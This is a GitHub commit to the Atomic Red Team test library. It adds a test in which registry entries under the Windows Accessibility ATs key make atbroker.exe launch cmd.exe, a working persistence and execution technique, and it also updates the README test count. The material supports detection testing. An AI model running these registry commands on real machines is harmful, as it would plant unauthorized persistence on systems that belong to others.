Update T1218.yaml (#2646)

* Update T1218.yaml add new test "Atbroker.exe (AT) Executes Arbitrary Command via Registry Key" * Update T1218.yaml Move to T1546.008 * Update T1546.008.yaml Details: Add new test - Atbroker.exe (AT) Executes Arbitrary Command via Registry Key Add new test "Atbroker.exe (AT) Executes Arbitrary Command via Registry Key" * updating atomics count in README.md [ci skip] --------- Co-authored-by: publish bot <[email protected]> Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Jan 20, 2024 · 871b418 · 871b418
1 parent 6534869
commit 871b418
Show file tree

Hide file tree

Showing 2 changed files with 16 additions and 1 deletion.
diff --git a/README.md b/README.md
@@ -16,7 +16,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1500-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1504-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
@@ -87,3 +87,18 @@ atomic_tests:
       icacls %windir%\system32\osk.exe /grant:r Administrators:RX
     name: command_prompt
     elevation_required: true
+- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
+  auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
+  description: |
+    Executes code specified in the registry for a new AT (Assistive Technologies).
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+       reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
+       reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+       atbroker /start malware_test
+    cleanup_command: |
+       reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+    name: command_prompt